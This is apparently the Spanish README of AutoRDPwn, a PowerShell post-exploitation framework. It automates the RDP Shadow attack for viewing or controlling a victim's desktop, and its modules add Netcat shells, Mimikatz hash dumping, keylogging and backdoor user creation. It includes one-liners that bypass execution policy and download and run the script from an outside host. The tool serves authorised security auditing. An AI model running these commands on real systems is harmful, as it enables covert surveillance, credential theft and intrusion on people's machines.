
El Framework de Ataque Shadow

AutoRDPwn es un framework de post-explotación creado en Powershell, diseñado principalmente para automatizar el ataque Shadow en computadoras Microsoft Windows. Esta vulnerabilidad (listada como una característica por Microsoft) permite a un atacante remoto ver el escritorio de su víctima sin su consentimiento, e incluso controlarlo a demanda, utilizando herramientas nativas del propio sistema operativo.
Gracias a los módulos adicionales, es posible obtener un shell remoto a través de Netcat, volcar hashes del sistema con Mimikatz, cargar un keylogger remoto y mucho más. Todo esto, a través de un menú completamente intuitivo en siete idiomas diferentes.
Además, es posible usarlo en una reverse shell a través de una serie de parámetros que se describen en la sección de uso.
Powershell 4.0 o superior
• Muchos errores corregidos
• Mejoras estéticas y tiempos de espera mejorados
• Conexión Proxy-Aware a través de la configuración del sistema
• Ahora es posible usar la herramienta sin conexión descargando el archivo .zip
• Detección automática de idioma presionando la tecla Enter
• Invoke-DCOM ha sido reemplazado por SharpRDP
• PowerUp ha sido reemplazado por Invoke-PrivescCheck
• Creación de la subrutina de limpieza automática en la víctima
• Nuevo módulo disponible: SMB Shell cifrado con AES
• Nuevo módulo disponible: Cambiar usuario con RunAs
*El resto de los cambios se pueden consultar en el archivo CHANGELOG
Esta aplicación se puede usar de forma local, remota o para pivotar entre equipos.
Cuando se usa de forma remota en una reverse shell, es necesario usar los siguientes parámetros:
Ejecución local en una línea:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"
Ejemplo de ejecución remota en una línea:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"
https://darkbyte.net/autordpwn-la-guia-definitiva

Este proyecto está licenciado bajo la licencia GNU 3.0 - consulte el archivo LICENSE para más detalles.
Este framework ha sido creado y diseñado desde cero por Joel Gámez Molina // @JoelGMSec
Algunos módulos usan código, scripts y herramientas de terceros, particularmente:
• Chachi-Enumerator by Luis Vacas --> https://github.com/Hackplayers/PsCabesha-tools
• Invoke-Phant0m by Halil Dalabasmaz --> https://github.com/hlldz/Invoke-Phant0m
• Invoke-PowerShellTcp by Nikhil "SamratAshok" Mittal --> https://github.com/samratashok/nishang
• Invoke-TheHash by Kevin Robertson --> https://github.com/Kevin-Robertson/Invoke-TheHash
• Mimikatz by Benjamin Delpy --> https://github.com/gentilkiwi/mimikatz
• PsExec by Mark Russinovich --> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• RDP Wrapper by Stas'M Corp. --> https://github.com/stascorp/rdpwrap
• SharpRDP by Steven F --> https://github.com/0xthirteen/SharpRDP
Y muchos más, que no caben aquí.. Gracias a todos ellos y su excelente trabajo.
Este software no ofrece ningún tipo de garantía. Su uso es exclusivo para entornos educativos y/o auditorías de seguridad con el consentimiento correspondiente del cliente. No soy responsable de su mal uso ni de cualquier posible daño causado por el mismo.
Para más información, puedes encontrarme en Twitter como @JoelGMSec y en mi blog darkbyte.net.
Puedes apoyar mi trabajo invitándome a un café:
| Parámetro | Descripción |
|---|
| -admin / -noadmin | Dependiendo de los permisos que tengamos, usaremos uno u otro |
| -nogui | Esto evitará cargar el menú y algunos colores, garantizando su funcionalidad |
| -lang | Elegiremos nuestro idioma (Inglés, Español, Francés, Alemán, Italiano, Ruso o Portugués) |
| -option | Al igual que con el menú, podemos elegir cómo lanzar el ataque |
| -shadow | Decidiremos si queremos ver o controlar el dispositivo remoto |
| -createuser | Este parámetro es opcional, el usuario AutoRDPwn:AutoRDPwn se creará en la máquina víctima |
| -noclean | Desactiva el proceso de deshacer todos los cambios en el equipo víctima |